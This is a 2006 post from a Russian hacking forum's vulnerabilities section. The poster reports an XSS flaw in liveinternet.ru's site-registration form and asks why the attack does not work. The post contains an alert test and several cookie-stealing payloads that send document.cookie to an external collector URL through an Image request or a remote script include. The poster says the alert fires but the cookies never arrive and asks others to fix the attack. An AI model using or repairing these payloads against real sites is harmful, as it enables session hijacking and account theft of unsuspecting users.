ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

liveinternet
  #1  
Старый 11.11.2006, 18:34
Аватар для LeverOne
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию liveinternet

найдено D=P=CH= MOD=
http://www.liveinternet.ru/add

Вводим
"><script>alert("xss")</script>

алерт работает!
Но КУКИ не приходят!!!!
Хотя ввожу в поле "Ключевые слова" все верно:
"<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">
либо
"<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и даже этим способом:
"<srcipt src=http://мой_сайт.ru/js.js></script>

Пробую "регить сайт", заходя со своего акка.
Не приходят, мать их!!!

Не понимаю, в чем дело? Подскажите!

Последний раз редактировалось LeverOne; 11.11.2006 в 21:12..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ